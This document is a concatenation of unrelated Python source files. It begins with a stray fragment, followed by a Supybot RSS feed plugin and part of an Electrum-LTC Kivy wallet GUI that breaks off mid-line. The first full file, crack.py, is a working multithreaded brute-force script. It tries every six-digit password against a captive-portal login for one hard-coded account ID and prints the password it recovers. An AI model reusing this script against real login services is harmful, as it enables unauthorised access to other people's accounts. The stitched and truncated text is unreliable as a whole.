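    # matching the old_idx/new_idx loop in forward().
    return frame_major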
crack.py
# -*- coding: utf-8 -*- import os import re import sys import string import requests import threading flag = False correct = "None" def getpwd(username,query_str,minr,maxr): global flag global correct url = 'http://192.168.50.3:8080/eportal/InterFace.do?method=login' i = minr while i < maxr: password = "%06d" % i i = i + 1 post_data = { 'userId': username, 'password': password, 'queryString': query_str, 'service': '', 'operatorPwd': '', 'validcode': '', } responce = requests.request('POST', url, data=post_data) responce.encoding = 'UTF-8' res_json = responce.json() if flag == False and (res_json['result'] == 'success' or res_json['message'] == '您的账户已欠费,为了不影响您正常使用网络,请尽快缴费!'): print(password+" "+"破解成功") correct = password flag = True elif res_json['result'] == 'fail': if res_json['message'] == '密码不匹配,请输入正确的密码!': print("%d %s"%(i,password+" "+res_json['message']+" "+res_json['result'])) else: print(password+" "+res_json['message']+" "+res_json['result']) # i = i - 1 continue if flag == True: return if __name__ == '__main__': # 测试请求 try: result = requests.get('http://www.baidu.com') except Exception: print('Failed to connect test website!') sys.exit() #未联网则开始破解 if result.text.find('eportal') != -1: threadl = [] usrname = 'D201677754' pattarn = re.compile(r"href=.*?\?(.*?)'") query_str = pattarn.findall(result.text) for i in range(1,32): t = threading.Thread(target=getpwd, args =(usrname,query_str,10000*i,10000*(i+1))) threadl.append(t) for t in threadl: t.start() for t in threadl: t.join() print(usrname+" 正确密码为: "+correct) os.system("pause"); elif result.text.find('baidu') != -1: print('请在未联网下进行') else: print("Opps, something goes wrong!")
plugin.py
### # Copyright (c) 2002-2004, Jeremiah Fincher # Copyright (c) 2008-2010, James McCoy # Copyright (c) 2014, Valentin Lorentz # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, # this list of conditions, and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions, and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the author of this software nor the name of # contributors to this software may be used to endorse or promote products # derived from this software without specific prior written consent. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. ### import re import os import sys import json import time import types import string import socket import threading import feedparser import supybot.conf as conf import supybot.utils as utils import supybot.world as world from supybot.commands import * import supybot.utils.minisix as minisix import supybot.ircmsgs as ircmsgs import supybot.ircutils as ircutils import supybot.registry as registry import supybot.callbacks as callbacks from supybot.i18n import PluginInternationalization, internationalizeDocstring _ = PluginInternationalization('RSS') if minisix.PY2: from urllib2 import ProxyHandler else: from urllib.request import ProxyHandler def get_feedName(irc, msg, args, state): if ircutils.isChannel(args[0]): state.errorInvalid('feed name', args[0], 'must not be channel names.') if not registry.isValidRegistryName(args[0]): state.errorInvalid('feed name', args[0], 'Feed names must not include spaces.') state.args.append(callbacks.canonicalName(args.pop(0))) addConverter('feedName', get_feedName) announced_headlines_filename = \ conf.supybot.directories.data.dirize('RSS_announced.flat') def only_one_at_once(f): lock = [False] def newf(*args, **kwargs): if lock[0]: return lock[0] = True try: f(*args, **kwargs) finally: lock[0] = False return newf class InvalidFeedUrl(ValueError): pass class Feed: __slots__ = ('url', 'name', 'data', 'last_update', 'entries', 'etag', 'modified', 'initial', 'lock', 'announced_entries') def __init__(self, name, url, initial, plugin_is_loading=False, announced=None): assert name, name if not url: if not utils.web.httpUrlRe.match(name): raise InvalidFeedUrl(name) url = name self.name = name self.url = url self.initial = initial self.data = None # We don't want to fetch feeds right after the plugin is # loaded (the bot could be starting, and thus already busy) self.last_update = time.time() if plugin_is_loading else 0 self.entries = [] self.etag = None 
self.modified = None self.lock = threading.Lock() self.announced_entries = announced or \ utils.structures.TruncatableSet() def __repr__(self): return 'Feed(%r, %r, %b, <bool>, %r)' % \ (self.name, self.url, self.initial, self.announced_entries) def get_command(self, plugin): docstring = format(_("""[<number of headlines>] Reports the titles for %s at the RSS feed %u. If <number of headlines> is given, returns only that many headlines. RSS feeds are only looked up every supybot.plugins.RSS.waitPeriod seconds, which defaults to 1800 (30 minutes) since that's what most websites prefer."""), self.name, self.url) def f(self2, irc, msg, args): args.insert(0, self.name) self2.rss(irc, msg, args) f = utils.python.changeFunctionName(f, self.name, docstring) f = types.MethodType(f, plugin) return f _sort_parameters = { 'oldestFirst': (('published_parsed', 'updated_parsed'), False), 'newestFirst': (('published_parsed', 'updated_parsed'), True), 'outdatedFirst': (('updated_parsed', 'published_parsed'), False), 'updatedFirst': (('updated_parsed', 'published_parsed'), True), } def _sort_arguments(order): (fields, reverse) = _sort_parameters[order] def key(entry): for field in fields: if field in entry: return entry[field] raise KeyError('No date field in entry.') return (key, reverse) def sort_feed_items(items, order): """Return feed items, sorted according to sortFeedItems.""" if order == 'asInFeed': return items (key, reverse) = _sort_arguments(order) try: sitems = sorted(items, key=key, reverse=reverse) except KeyError: # feedparser normalizes required timestamp fields in ATOM and RSS # to the "published"/"updated" fields. Feeds missing it are unsortable by date. return items return sitems def load_announces_db(fd): return dict((name, utils.structures.TruncatableSet(entries)) for (name, entries) in json.load(fd).items()) def save_announces_db(db, fd): json.dump(dict((name, list(entries)) for (name, entries) in db), fd) class RSS(callbacks.Plugin): """This plugin is useful both for announcing updates to RSS feeds in a channel, and for retrieving the headlines of RSS feeds via command. 
Use the "add" command to add feeds to this plugin, and use the "announce" command to determine what feeds should be announced in a given channel.""" threaded = True def __init__(self, irc): self.__parent = super(RSS, self) self.__parent.__init__(irc) # Scheme: {name: url} self.feed_names = callbacks.CanonicalNameDict() # Scheme: {url: feed} self.feeds = {} if os.path.isfile(announced_headlines_filename): with open(announced_headlines_filename) as fd: announced = load_announces_db(fd) else: announced = {} for name in self.registryValue('feeds'): self.assert_feed_does_not_exist(name) self.register_feed_config(name) try: url = self.registryValue(registry.join(['feeds', name])) except registry.NonExistentRegistryEntry: self.log.warning('%s is not a registered feed, removing.',name) continue try: self.register_feed(name, url, True, True, announced.get(name, [])) except InvalidFeedUrl: self.log.error('%s is not a valid feed, removing.', name) continue world.flushers.append(self._flush) def die(self): self._flush() world.flushers.remove(self._flush) self.__parent.die() def _flush(self): l = [(f.name, f.announced_entries) for f in self.feeds.values()] with utils.file.AtomicFile(announced_headlines_filename, 'w', backupDir='/dev/null') as fd: save_announces_db(l, fd) ################## # Feed registering def assert_feed_does_not_exist(self, name, url=None): if self.isCommandMethod(name): s = format(_('I already have a command in this plugin named %s.'), name) raise callbacks.Error(s) if url: feed = self.feeds.get(url) if feed and feed.name != feed.url: s = format(_('I already have a feed with that URL named %s.'), feed.name) raise callbacks.Error(s) def register_feed_config(self, name, url=''): self.registryValue('feeds').add(name) group = self.registryValue('feeds', value=False) conf.registerGlobalValue(group, name, registry.String(url, '')) feed_group = conf.registerGroup(group, name) conf.registerChannelValue(feed_group, 'format', registry.String('', _("""Feed-specific format. Defaults to supybot.plugins.RSS.format if empty."""))) conf.registerChannelValue(feed_group, 'announceFormat', registry.String('', _("""Feed-specific announce format. 
Defaults to supybot.plugins.RSS.announceFormat if empty."""))) conf.registerGlobalValue(feed_group, 'waitPeriod', registry.NonNegativeInteger(0, _("""If set to a non-zero value, overrides supybot.plugins.RSS.waitPeriod for this particular feed."""))) def register_feed(self, name, url, initial, plugin_is_loading, announced=[]): self.feed_names[name] = url self.feeds[url] = Feed(name, url, initial, plugin_is_loading, announced) def remove_feed(self, feed): del self.feed_names[feed.name] del self.feeds[feed.url] conf.supybot.plugins.RSS.feeds().remove(feed.name) conf.supybot.plugins.RSS.feeds.unregister(feed.name) ################## # Methods handling def isCommandMethod(self, name): if not self.__parent.isCommandMethod(name): return bool(self.get_feed(name)) else: return True def listCommands(self): return self.__parent.listCommands(self.feed_names.keys()) def getCommandMethod(self, command): try: return self.__parent.getCommandMethod(command) except AttributeError: return self.get_feed(command[0]).get_command(self) def __call__(self, irc, msg): self.__parent.__call__(irc, msg) threading.Thread(target=self.update_feeds).start() ################## # Status accessors def get_feed(self, name): return self.feeds.get(self.feed_names.get(name, name), None) def is_expired(self, feed): assert feed period = self.registryValue('waitPeriod') if feed.name != feed.url: # Named feed specific_period = self.registryValue('feeds.%s.waitPeriod' % feed.name) if specific_period: period = specific_period event_horizon = time.time() - period return feed.last_update < event_horizon ############### # Feed fetching def update_feed(self, feed): handlers = [] if utils.web.proxy(): handlers.append(ProxyHandler( {'http': utils.force(utils.web.proxy())})) handlers.append(ProxyHandler( {'https': utils.force(utils.web.proxy())})) with feed.lock: d = feedparser.parse(feed.url, etag=feed.etag, modified=feed.modified, handlers=handlers) if 'status' not in d or d.status != 304: # Not modified if 'etag' in d: feed.etag = d.etag if 'modified' in d: feed.modified = d.modified feed.data = d.feed feed.entries = d.entries feed.last_update = time.time() (initial, feed.initial) = (feed.initial, False) self.announce_feed(feed, initial) def update_feed_in_thread(self, feed): feed.last_update = time.time() t = world.SupyThread(target=self.update_feed, name=format('Fetching feed %u', feed.url), args=(feed,)) t.setDaemon(True) t.start() def update_feed_if_needed(self, feed): if self.is_expired(feed): self.update_feed(feed) @only_one_at_once def update_feeds(self): announced_feeds = set() for irc in world.ircs: for channel in irc.state.channels: announced_feeds |= self.registryValue('announce', channel) for name in announced_feeds: feed = self.get_feed(name) if not feed: self.log.warning('Feed %s is announced but does not exist.', name) continue self.update_feed_if_needed(feed) def get_new_entries(self, feed): # http://validator.w3.org/feed/docs/rss2.html#hrelementsOfLtitemgt get_id = lambda entry: entry.id if hasattr(entry, 'id') else ( entry.title if hasattr(entry, 'title') else entry.description) with feed.lock: entries = feed.entries new_entries = [entry for entry in entries if get_id(entry) not in feed.announced_entries] if not new_entries: return [] feed.announced_entries |= set(get_id(entry) for entry in new_entries) # We keep a little more because we don't want to re-announce # oldest entries if one of the newest gets removed. 
feed.announced_entries.truncate(10*len(entries)) return new_entries def announce_feed(self, feed, initial): new_entries = self.get_new_entries(feed) order = self.registryValue('sortFeedItems') new_entries = sort_feed_items(new_entries, order) for irc in world.ircs: for channel in irc.state.channels: if feed.name not in self.registryValue('announce', channel): continue if initial: n = self.registryValue('initialAnnounceHeadlines', channel) if n: announced_entries = new_entries[-n:] else: announced_entries = [] else: announced_entries = new_entries for entry in announced_entries: self.announce_entry(irc, channel, feed, entry) ################# # Entry rendering def should_send_entry(self, channel, entry): whitelist = self.registryValue('keywordWhitelist', channel) blacklist = self.registryValue('keywordBlacklist', channel) # fix shadowing by "from supybot.commands import *" try: all = __builtins__.all any = __builtins__.any except AttributeError: all = __builtins__['all'] any = __builtins__['any'] if whitelist: if all(kw not in entry.title and kw not in entry.description for kw in whitelist): return False if blacklist: if any(kw in entry.title or kw in entry.description for kw in blacklist): return False return True _normalize_entry = utils.str.multipleReplacer( {'\r': ' ', '\n': ' ', '\x00': ''}) def format_entry(self, channel, feed, entry, is_announce): key_name = 'announceFormat' if is_announce else 'format' if feed.name in self.registryValue('feeds'): specific_key_name = registry.join(['feeds', feed.name, key_name]) template = self.registryValue(specific_key_name, channel) or \ self.registryValue(key_name, channel) else: template = self.registryValue(key_name, channel) date = entry.get('published_parsed') date = utils.str.timestamp(date) s = string.Template(template).substitute( entry, feed_name=feed.name, date=date) return self._normalize_entry(s) def announce_entry(self, irc, channel, feed, entry): if self.should_send_entry(channel, entry): s = self.format_entry(channel, feed, entry, True) if self.registryValue('notice', channel): m = ircmsgs.notice(channel, s) else: m = ircmsgs.privmsg(channel, s) irc.queueMsg(m) ########## # Commands @internationalizeDocstring def add(self, irc, msg, args, name, url): """<name> <url> Adds a command to this plugin that will look up the RSS feed at the given URL. """ self.assert_feed_does_not_exist(name, url) self.register_feed_config(name, url) self.register_feed(name, url, True, False) irc.replySuccess() add = wrap(add, ['feedName', 'url']) @internationalizeDocstring def remove(self, irc, msg, args, name): """<name> Removes the command for looking up RSS feeds at <name> from this plugin. """ feed = self.get_feed(name) if not feed: irc.error(_('That\'s not a valid RSS feed command name.')) return self.remove_feed(feed) irc.replySuccess() remove = wrap(remove, ['feedName']) class announce(callbacks.Commands): @internationalizeDocstring def list(self, irc, msg, args, channel): """[<channel>] Returns the list of feeds announced in <channel>. <channel> is only necessary if the message isn't sent in the channel itself. """ announce = conf.supybot.plugins.RSS.announce feeds = format('%L', list(announce.get(channel)())) irc.reply(feeds or _('I am currently not announcing any feeds.')) list = wrap(list, ['channel',]) @internationalizeDocstring def add(self, irc, msg, args, channel, feeds): """[<channel>] <name|url> [<name|url> ...] Adds the list of feeds to the current list of announced feeds in <channel>. 
Valid feeds include the names of registered feeds as well as URLs for RSS feeds. <channel> is only necessary if the message isn't sent in the channel itself. """ plugin = irc.getCallback('RSS') invalid_feeds = [x for x in feeds if not plugin.get_feed(x) and not utils.web.urlRe.match(x)] if invalid_feeds: irc.error(format(_('These feeds are unknown: %L'), invalid_feeds), Raise=True) announce = conf.supybot.plugins.RSS.announce S = announce.get(channel)() for name in feeds: S.add(name) announce.get(channel).setValue(S) irc.replySuccess() for name in feeds: feed = plugin.get_feed(name) if not feed: plugin.register_feed_config(name, name) plugin.register_feed(name, name, True, False) feed = plugin.get_feed(name) plugin.announce_feed(feed, True) add = wrap(add, [('checkChannelCapability', 'op'), many(first('url', 'feedName'))]) @internationalizeDocstring def remove(self, irc, msg, args, channel, feeds): """[<channel>] <name|url> [<name|url> ...] Removes the list of feeds from the current list of announced feeds in <channel>. Valid feeds include the names of registered feeds as well as URLs for RSS feeds. <channel> is only necessary if the message isn't sent in the channel itself. """ announce = conf.supybot.plugins.RSS.announce S = announce.get(channel)() for feed in feeds: S.discard(feed) announce.get(channel).setValue(S) irc.replySuccess() remove = wrap(remove, [('checkChannelCapability', 'op'), many(first('url', 'feedName'))]) @internationalizeDocstring def rss(self, irc, msg, args, url, n): """<name|url> [<number of headlines>] Gets the title components of the given RSS feed. If <number of headlines> is given, return only that many headlines. """ self.log.debug('Fetching %u', url) feed = self.get_feed(url) if not feed: feed = Feed(url, url, True) if irc.isChannel(msg.args[0]): channel = msg.args[0] else: channel = None self.update_feed_if_needed(feed) entries = feed.entries if not entries: irc.error(_('Couldn\'t get RSS feed.')) return n = n or self.registryValue('defaultNumberOfHeadlines', channel) entries = list(filter(lambda e:self.should_send_entry(channel, e), feed.entries)) entries = entries[:n] headlines = map(lambda e:self.format_entry(channel, feed, e, False), entries) sep = self.registryValue('headlineSeparator', channel) irc.replies(headlines, joiner=sep) rss = wrap(rss, [first('url', 'feedName'), additional('int')]) @internationalizeDocstring def info(self, irc, msg, args, url): """<url|feed> Returns information from the given RSS feed, namely the title, URL, description, and last update date, if available. 
""" try: url = self.registryValue('feeds.%s' % url) except registry.NonExistentRegistryEntry: pass feed = self.get_feed(url) if not feed: feed = Feed(url, url, True) self.update_feed_if_needed(feed) info = feed.data if not info: irc.error(_('I couldn\'t retrieve that RSS feed.')) return # check the 'modified_parsed' key, if it's there, convert it here first if 'modified' in info: seconds = time.mktime(info['modified_parsed']) now = time.mktime(time.gmtime()) when = utils.timeElapsed(now - seconds) + ' ago' else: when = _('time unavailable') title = info.get('title', _('unavailable')) desc = info.get('description', _('unavailable')) link = info.get('link', _('unavailable')) # The rest of the entries are all available in the channel key response = format(_('Title: %s; URL: %u; ' 'Description: %s; Last updated: %s.'), title, link, desc, when) irc.reply(utils.str.normalizeWhitespace(response)) info = wrap(info, [first('url', 'feedName')]) RSS = internationalizeDocstring(RSS) Class = RSS # vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
main_window.py
import re import os import sys import time import datetime import traceback from decimal import Decimal import threading import electrum_ltc as electrum from electrum_ltc.bitcoin import TYPE_ADDRESS from electrum_ltc import WalletStorage, Wallet from electrum_ltc_gui.kivy.i18n import _ from electrum_ltc.paymentrequest import InvoiceStore from electrum_ltc.util import profiler, InvalidPassword from electrum_ltc.plugins import run_hook from electrum_ltc.util import format_satoshis, format_satoshis_plain from electrum_ltc.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED from kivy.app import App from kivy.core.window import Window from kivy.logger import Logger from kivy.utils import platform from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty, StringProperty, ListProperty, BooleanProperty, NumericProperty) from kivy.cache import Cache from kivy.clock import Clock from kivy.factory import Factory from kivy.metrics import inch from kivy.lang import Builder # lazy imports for factory so that widgets can be used in kv Factory.register('InstallWizard', module='electrum_ltc_gui.kivy.uix.dialogs.installwizard') Factory.register('InfoBubble', module='electrum_ltc_gui.kivy.uix.dialogs') Factory.register('OutputList', module='electrum_ltc_gui.kivy.uix.dialogs') Factory.register('OutputItem', module='electrum_ltc_gui.kivy.uix.dialogs') #from kivy.core.window import Window #Window.softinput_mode = 'below_target' # delayed imports: for startup speed on android notification = app = ref = None util = False # register widget cache for keeping memory down timeout to forever to cache # the data Cache.register('electrum_ltc_widgets', timeout=0) from kivy.uix.screenmanager import Screen from kivy.uix.tabbedpanel import TabbedPanel from kivy.uix.label import Label from kivy.core.clipboard import Clipboard Factory.register('TabbedCarousel', module='electrum_ltc_gui.kivy.uix.screens') # Register fonts without this you won't be able to use bold/italic... # inside markup. 
from kivy.core.text import Label Label.register('Roboto', 'gui/kivy/data/fonts/Roboto.ttf', 'gui/kivy/data/fonts/Roboto.ttf', 'gui/kivy/data/fonts/Roboto-Bold.ttf', 'gui/kivy/data/fonts/Roboto-Bold.ttf') from electrum_ltc.util import base_units class ElectrumWindow(App): electrum_config = ObjectProperty(None) language = StringProperty('en') num_blocks = NumericProperty(0) num_nodes = NumericProperty(0) def set_URI(self, uri): self.switch_to('send') self.send_screen.set_URI(uri) def on_new_intent(self, intent): if intent.getScheme() != 'litecoin': return uri = intent.getDataString() self.set_URI(uri) def on_language(self, instance, language): Logger.info('language: {}'.format(language)) _.switch_lang(language) def update_history(self, *dt): if self.history_screen: self.history_screen.update() def on_quotes(self, d): Logger.info("on_quotes") self._trigger_update_history() def on_history(self, d): Logger.info("on_history") self._trigger_update_history() def _get_bu(self): return self.electrum_config.get('base_unit', 'LTC') def _set_bu(self, value): assert value in base_units.keys() self.electrum_config.set_key('base_unit', value, True) self._trigger_update_status() self._trigger_update_history() base_unit = AliasProperty(_get_bu, _set_bu) status = StringProperty('') fiat_unit = StringProperty('') def on_fiat_unit(self, a, b): self._trigger_update_history() def decimal_point(self): return base_units[self.base_unit] def btc_to_fiat(self, amount_str): if not amount_str: return '' rate = self.fx.exchange_rate() if not rate: return '' fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8) return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.') def fiat_to_btc(self, fiat_amount): if not fiat_amount: return '' rate = self.fx.exchange_rate() if not rate: return '' satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate)) return format_satoshis_plain(satoshis, self.decimal_point()) def get_amount(self, amount_str): a, u = amount_str.split() assert u == self.base_unit try: x = Decimal(a) except: return None p = pow(10, self.decimal_point()) return int(p * x) _orientation = OptionProperty('landscape', options=('landscape', 'portrait')) def _get_orientation(self): return self._orientation orientation = AliasProperty(_get_orientation, None, bind=('_orientation',)) '''Tries to ascertain the kind of device the app is running on. Cane be one of `tablet` or `phone`. :data:`orientation` is a read only `AliasProperty` Defaults to 'landscape' ''' _ui_mode = OptionProperty('phone', options=('tablet', 'phone')) def _get_ui_mode(self): return self._ui_mode ui_mode = AliasProperty(_get_ui_mode, None, bind=('_ui_mode',)) '''Defines tries to ascertain the kind of device the app is running on. Cane be one of `tablet` or `phone`. 
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone' ''' def __init__(self, **kwargs): # initialize variables self._clipboard = Clipboard self.info_bubble = None self.nfcscanner = None self.tabs = None self.is_exit = False self.wallet = None super(ElectrumWindow, self).__init__(**kwargs) title = _('Electrum-LTC App') self.electrum_config = config = kwargs.get('config', None) self.language = config.get('language', 'en') self.network = network = kwargs.get('network', None) self.plugins = kwargs.get('plugins', []) self.gui_object = kwargs.get('gui_object', None) self.daemon = self.gui_object.daemon self.fx = self.daemon.fx # create triggers so as to minimize updation a max of 2 times a sec self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5) self._trigger_update_status = Clock.create_trigger(self.update_status, .5) self._trigger_update_history = Clock.create_trigger(self.update_history, .5) # cached dialogs self._settings_dialog = None self._password_dialog = None def wallet_name(self): return os.path.basename(self.wallet.storage.path) if self.wallet else ' ' def on_pr(self, pr): if pr.verify(self.wallet.contacts): key = self.wallet.invoices.add(pr) if self.invoices_screen: self.invoices_screen.update() status = self.wallet.invoices.get_status(key) if status == PR_PAID: self.show_error("invoice already paid") self.send_screen.do_clear() else: if pr.has_expired(): self.show_error(_('Payment request has expired')) else: self.switch_to('send') self.send_screen.set_request(pr) else: self.show_error("invoice error:" + pr.error) self.send_screen.do_clear() def on_qr(self, data): from electrum_ltc.bitcoin import base_decode, is_address data = data.strip() if is_address(data): self.set_URI(data) return if data.startswith('litecoin:'): self.set_URI(data) return # try to decode transaction from electrum_ltc.transaction import Transaction try: text = base_decode(data, None, base=43).encode('hex') tx = Transaction(text) tx.deserialize() except: tx = None if tx: self.tx_dialog(tx) return # show error self.show_error("Unable to decode QR data") def update_tab(self, name): s = getattr(self, name + '_screen', None) if s: s.update() @profiler def update_tabs(self): for tab in ['invoices', 'send', 'history', 'receive', 'requests']: self.update_tab(tab) def switch_to(self, name): s = getattr(self, name + '_screen', None) if self.send_screen is None: s = self.tabs.ids[name + '_screen'] s.load_screen() panel = self.tabs.ids.panel tab = self.tabs.ids[name + '_tab'] panel.switch_to(tab) def show_request(self, addr): self.switch_to('receive') self.receive_screen.screen.address = addr def show_pr_details(self, req, status, is_invoice): from electrum_ltc.util import format_time requestor = req.get('requestor') exp = req.get('exp') memo = req.get('memo') amount = req.get('amount') popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv') popup.is_invoice = is_invoice popup.amount = amount popup.requestor = requestor if is_invoice else req.get('address') popup.exp = format_time(exp) if exp else '' popup.description = memo if memo else '' popup.signature = req.get('signature', '') popup.status = status txid = req.get('txid') popup.tx_hash = txid or '' popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', [])) popup.open() def qr_dialog(self, title, data, show_text=False): from uix.dialogs.qr_dialog import QRDialog popup = QRDialog(title, data, show_text) popup.open() def scan_qr(self, on_complete): if platform != 'android': return from jnius import autoclass 
from android import activity PythonActivity = autoclass('org.kivy.android.PythonActivity') Intent = autoclass('android.content.Intent') intent = Intent("com.google.zxing.client.android.SCAN") intent.putExtra("SCAN_MODE", "QR_CODE_MODE") def on_qr_result(requestCode, resultCode, intent): if requestCode == 0: if resultCode == -1: # RESULT_OK: contents = intent.getStringExtra("SCAN_RESULT") if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE': on_complete(contents) else: self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT")) activity.bind(on_activity_result=on_qr_result) try: PythonActivity.mActivity.startActivityForResult(intent, 0) except: self.show_error(_('Could not start Barcode Scanner.') + ' ' + _('Please install the Barcode Scanner app from ZXing')) def scan_qr_zxing(self, on_complete): # uses zxing embedded lib if platform != 'android': return from jnius import autoclass from android import activity PythonActivity = autoclass('org.kivy.android.PythonActivity') IntentIntegrator = autoclass('com.google.zxing.integration.android.IntentIntegrator') integrator = IntentIntegrator(PythonActivity.mActivity) def on_qr_result(requestCode, resultCode, intent): if requestCode == 0: if resultCode == -1: # RESULT_OK: contents = intent.getStringExtra("SCAN_RESULT") if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE': on_complete(contents) else: self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT")) activity.bind(on_activity_result=on_qr_result) integrator.initiateScan() def do_share(self, data, title): if platform != 'android': return from jnius import autoclass, cast JS = autoclass('java.lang.String') Intent = autoclass('android.content.Intent') sendIntent = Intent() sendIntent.setAction(Intent.ACTION_SEND) sendIntent.setType("text/plain") sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data)) PythonActivity = autoclass('org.kivy.android.PythonActivity') currentActivity = cast('android.app.Activity', PythonActivity.mActivity) it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title))) currentActivity.startActivity(it) def build(self): return Builder.load_file('gui/kivy/main.kv') def _pause(self): if platform == 'android': # move activity to back from jnius import autoclass python_act = autoclass('org.kivy.android.PythonActivity') mActivity = python_act.mActivity mActivity.moveTaskToBack(True) def on_start(self): ''' This is the start point of the kivy ui ''' import time Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock())) win = Window win.bind(size=self.on_size, on_keyboard=self.on_keyboard) win.bind(on_key_down=self.on_key_down) #win.softinput_mode = 'below_target' self.on_size(win, win.size) self.init_ui() self.load_wallet_by_name(self.electrum_config.get_wallet_path()) # init plugins run_hook('init_kivy', self) # fiat currency self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else '' self.network.register_callback(self.on_quotes, ['on_quotes']) self.network.register_callback(self.on_history, ['on_history']) # default tab self.switch_to('history') # bind intent for bitcoin: URI scheme if platform == 'android': from android import activity from jnius import autoclass PythonActivity = autoclass('org.kivy.android.PythonActivity') mactivity = PythonActivity.mActivity self.on_new_intent(mactivity.getIntent()) activity.bind(on_new_intent=self.on_new_intent) # URI passed in config uri = self.electrum_config.get('url') if uri: self.set_URI(uri) def get_wallet_path(self): if self.wallet: return 
self.wallet.storage.path else: return '' def on_wizard_complete(self, instance, wallet): if wallet: wallet.start_threads(self.daemon.network) self.daemon.add_wallet(wallet) self.load_wallet(wallet) self.on_resume() def load_wallet_by_name(self, path): if not path: return wallet = self.daemon.load_wallet(path, None) if wallet: if wallet != self.wallet: self.stop_wallet() self.load_wallet(wallet) self.on_resume() else: Logger.debug('Electrum: Wallet not found. Launching install wizard') storage = WalletStorage(path) wizard = Factory.InstallWizard(self.electrum_config, storage) wizard.bind(on_wizard_complete=self.on_wizard_complete) action = wizard.storage.get_action() wizard.run(action) def on_stop(self): self.stop_wallet() def stop_wallet(self): if self.wallet: self.daemon.stop_wallet(self.wallet.storage.path) self.wallet = None def on_key_down(self, instance, key, keycode, codepoint, modifiers): if 'ctrl' in modifiers: # q=24 w=25 if keycode in (24, 25): self.stop() elif keycode == 27: # r=27 # force update wallet self.update_wallet() elif keycode == 112: # pageup #TODO move to next tab pass elif keycode == 117: # pagedown #TODO move to prev tab pass #TODO: alt+tab_number to activate the particular tab def on_keyboard(self, instance, key, keycode, codepoint, modifiers): if key == 27 and self.is_exit is False: self.is_exit = True self.show_info(_('Press again to exit')) return True # override settings button if key in (319, 282): #f1/settings button on android #self.gui.main_gui.toggle_settings(self) return True def settings_dialog(self): if self._settings_dialog is None: from uix.dialogs.settings import SettingsDialog self._settings_dialog = SettingsDialog(self) self._settings_dialog.update() self._settings_dialog.open() def popup_dialog(self, name): if name == 'settings': self.settings_dialog() elif name == 'wallets': from uix.dialogs.wallets import WalletDialog d = WalletDialog() d.open() else: popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv') popup.open() @profiler def init_ui(self): ''' Initialize The Ux part of electrum. This function performs the basic tasks of setting up the ui. ''' from weakref import ref self.funds_error = False # setup UX self.screens = {} #setup lazy imports for mainscreen Factory.register('AnimatedPopup', module='electrum_ltc_gui.kivy.uix.dialogs') Factory.register('QRCodeWidget', module='electrum_ltc_gui.kivy.uix.qrcodewidget') # preload widgets. 
Remove this if you want to load the widgets on demand #Cache.append('electrum_ltc_widgets', 'AnimatedPopup', Factory.AnimatedPopup()) #Cache.append('electrum_ltc_widgets', 'QRCodeWidget', Factory.QRCodeWidget()) # load and focus the ui self.root.manager = self.root.ids['manager'] self.history_screen = None self.contacts_screen = None self.send_screen = None self.invoices_screen = None self.receive_screen = None self.requests_screen = None self.icon = "icons/electrum-ltc.png" # connect callbacks if self.network: interests = ['updated', 'status', 'new_transaction', 'verified'] self.network.register_callback(self.on_network, interests) self.tabs = self.root.ids['tabs'] def on_network(self, event, *args): if event == 'updated': self.num_blocks = self.network.get_local_height() self.num_nodes = len(self.network.get_interfaces()) self._trigger_update_wallet() elif event == 'status': self._trigger_update_status() elif event == 'new_transaction': self._trigger_update_wallet() elif event == 'verified': self._trigger_update_wallet() @profiler def load_wallet(self, wallet): self.wallet = wallet self.update_wallet() # Once GUI has been initialized check if we want to announce something # since the callback has been called before the GUI was initialized if self.receive_screen: self.receive_screen.clear() self.update_tabs() run_hook('load_wallet', wallet, self) def update_status(self, *dt): if not self.wallet: self.status = _("No Wallet") return if self.network is None or not self.network.is_running(): status = _("Offline") elif self.network.is_connected(): server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height if not self.wallet.up_to_date or server_height == 0: status = _("Synchronizing...") elif server_lag > 1: status = _("Server lagging (%d blocks)"%server_lag) else: c, u, x = self.wallet.get_balance() text = self.format_amount(c+x+u) status = str(text.strip() + ' ' + self.base_unit) else: status = _("Not connected") n = self.wallet.basename() self.status = 